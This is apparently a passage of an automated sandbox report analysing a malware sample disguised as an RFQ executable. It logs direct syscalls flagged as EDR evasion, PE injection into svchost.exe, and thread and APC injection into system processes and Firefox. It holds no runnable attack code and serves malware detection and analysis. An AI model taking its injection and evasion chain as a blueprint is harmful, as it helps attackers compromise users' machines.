              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]1_2_02F30887
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]1_2_02F60854
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]1_2_02F42840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]1_2_02F52835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]1_2_02F6A830
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]1_2_02FBC810
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02FBE9E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]1_2_02F649D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02FFA9D3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]1_2_02FC69C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]1_2_02FB89B3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]1_2_02FBC97C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EC81F7
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E9A395
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9A364 SetUnhandledExceptionFilter,0_2_00E9A364
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory written: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe base: 400000 value starts with: 4D5AJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread register set: target process: 2424Jump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeThread register set: target process: 7012Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread APC queued: target process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3BE008Jump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EC8C93 LogonUserW,0_2_00EC8C93
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E73B4C
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E74A35
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED4EF5 mouse_event,0_2_00ED4EF5
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EC81F7
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00ED4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00ED4C03
              Source: RFQ - MK FMHS.RFQ.24.101.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: RFQ - MK FMHS.RFQ.24.101.exe, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000000.1665927413.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102897169.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000000.1665927413.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102897169.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103243557.0000000000CB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000000.1665927413.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102897169.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103243557.0000000000CB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000000.1665927413.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102897169.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103243557.0000000000CB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E9886B cpuid 0_2_00E9886B
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
